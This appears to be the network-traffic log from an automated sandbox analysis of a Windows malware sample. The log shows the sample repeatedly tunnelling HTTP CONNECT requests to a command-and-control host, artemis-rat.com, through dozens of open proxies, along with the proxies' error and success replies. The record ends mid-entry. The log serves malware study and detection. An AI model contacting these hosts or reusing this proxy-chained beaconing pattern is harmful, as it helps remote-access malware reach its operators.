                                              Mar 11, 2024 08:39:20.397509098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              746192.168.2.451388194.213.208.22681807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.049818993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.944509983 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              747192.168.2.44986445.88.90.19931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.062206984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163070917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.163680077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.163553953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              748192.168.2.452335171.244.140.160316437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.063200951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.858338118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.035820961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292306900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              749192.168.2.452486104.16.107.206807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.063350916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.217735052 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              750192.168.2.452497104.25.230.252807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.063975096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.218369961 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              751192.168.2.45241072.217.216.23941457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.099942923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              752192.168.2.45241398.178.72.21109197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.100044966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              753192.168.2.45246520.118.1.11280007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.100244045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.300018072 CET176INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Length: 19
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              754192.168.2.45241298.162.25.1641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.102912903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              755192.168.2.45249131.204.28.9654327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.112528086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.321800947 CET308INHTTP/1.1 407 Proxy Authentication Required
                                              Server: FaaS v1.3-20220203-7fa38bd5af
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 65
                                              Proxy-Authenticate: Basic realm="Proxy"
                                              Connection: close
                                              Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                              Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              756192.168.2.45236814.103.24.14880007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.120630026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              757192.168.2.45151451.15.212.207163797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.130045891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163279057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257256985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366661072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.381968021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.553774118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:08.569348097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:32.593168020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:20.600617886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              758192.168.2.45238982.64.77.30807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.130913973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.432054043 CET555INHTTP/1.1 403 Proxy Error
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Server: Apache
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 313
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              759192.168.2.452531203.32.120.195807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.139864922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.294308901 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              760192.168.2.452537185.238.228.202807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.143141031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.297864914 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              761192.168.2.452544172.67.255.224807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.147423029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.302143097 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              762192.168.2.44997767.217.61.162807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.153286934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163304090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257286072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366658926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.381969929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.553852081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:09.808842897 CET62INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache/2


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              763192.168.2.451502167.71.5.8380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.153338909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.822782040 CET28INHTTP/1.1 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              764192.168.2.45127041.242.116.150500037284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:20.160175085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.163340092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.257260084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.366697073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:44.381999016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:56.556278944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:08.570657969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:32.593571901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:20.600621939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
